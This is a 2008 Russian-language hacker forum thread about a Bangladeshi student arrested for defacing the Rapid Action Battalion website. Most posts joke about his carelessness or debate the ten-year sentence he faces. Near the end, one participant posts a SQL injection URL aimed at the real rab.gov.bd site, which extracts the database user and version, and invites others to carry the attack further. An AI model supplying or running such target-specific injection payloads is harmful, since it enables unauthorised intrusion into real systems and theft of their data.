Просмотр полной версии : Хакер в дефейсе написал как найти себя
Хакер из Бангладеша, выразивший свое недовольство новым законодательством, направленным на борьбу с киберпреступностью, но не регулирующим предоставление информации об информационных технологиях, арестован.
21-летний студент Шахи Мирза произвел дефейс сайта Rapid Action Battalion (RAB), элитной службы безопасности Бангладеш, и оставил на нем свой электронный адрес и надпись "Взломано из Бангладеш". Через сутки после этого Мирза и трое его друзей были арестованы. По данным источника, Мирза сознался в содеянном, и заявил, что не преследовал цели нанести какой-либо вред. Это, конечно, так, поскольку одна из размещенных на взломанном сайте фраз гласит: "Хакеры – не преступники, они в 10 раз лучше, чем вы о них думаете".
Нетрудно догадаться, почему власти Бангладеш так быстро вычислили подозреваемых. Мирзе и его друзьям, в случае признания их виновными, грозит до 10 лет тюрьмы.
взял (с) Hackersoft.ru
П.С.фоток к теме нету
)))))))) и такое бывает)))
Только не понятно чего он хотел добиться.
Выражать протест таким способом не очень разумно.
GreenBear
12.09.2008, 01:03
мда вспомнились дефейсы народ ру "хакед бай ... , асику ...."
De-visible
12.09.2008, 01:06
мда вспомнились дефейсы народ ру "хакед бай ... , асику ...."
но их щас уже нет на ачате.
Alexandr II
12.09.2008, 01:14
Только не понятно чего он хотел добиться.
Выражать протест таким способом не очень разумно.
не думаю что протест.. наверное просто захотелось на нарах посидеть... =))
а если серьезно, то непонимаю, них..я... как будто и впрямь хотел чтоб о нем узнали.. да и менты поймали...
Karantin
12.09.2008, 01:30
Могли и подставить.
в тюряге то кормят наверно=)) мож он с голодухи это организовал?=)
Alexandr II
12.09.2008, 03:22
в тюряге то кормят наверно=)) мож он с голодухи это организовал?=)
угу за инет платить бабки нашёл и за комп... а на еду нехватает=))
Могли и подставить.
ога, а он потом созналса от нефиг делать?)
deniska1517
12.09.2008, 15:07
оставит свой след тоже надо. можно подумать все те, кто создаёт хак утиллы не пишут там сделлано бай ............ или (С) ...........
оставит свой след тоже надо. можно подумать все те, кто создаёт хак утиллы не пишут там сделлано бай ............ или (С) ...........
В жизни нужно оставлять не такой след. Плохое забудется, ладно если бы он сделал хоть что-то хорошее.
ps. но это мое мнение, а мнений столько сколько нас всех на нашей планете)
В жизни нужно оставлять не такой след. Плохое забудется, ладно если бы он сделал хоть что-то хорошее.
Угу.Полностью согласен.
Но 10 лет. за дефейс %) ппц. просто.
грозит до 10 лет тюрьмы.
а не переувеличили тут?
[Dezzter]
12.09.2008, 19:59
ога, а он потом созналса от нефиг делать?)
Наверно ты просто не знаешь как в ментовке допрашивают, и лампочку заставлюбт выкручивать, а когда ты встаёшь на стул то со всей силы по почкам, либо лист а4 прикладывают к почкам и ебошат, ни сиников ни чего, ой да что тут говорить способ масса, возможно действительно подстава
эф пять на главной чуваки
линку гуглите.
В рот мне ноги! (http://www.rab.gov.bd/)
Действительно,жалко парня.
Вместо того чтобы людей сажать, свой *****тый батальон уволили бы. Элитный мля.
Элитная да и ещё служба безопастности...
deniska1517
13.09.2008, 21:14
с тобой полностью согласен. но про про то, какой след будит у тебя решать только тебе(у меня надеюсь хороший))))
Пошёл берёзки считать, хотя мб отмажеться
LiteMentaL
14.09.2008, 13:35
и правда жаль парня :)
бухоха
http://www.rab.gov.bd/about_us.php?page=2-1+and+1=0+UNION+SELECT+1,2,concat_ws(0x3a,user(),v ersion()),4/*
Дальше справитесь?
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot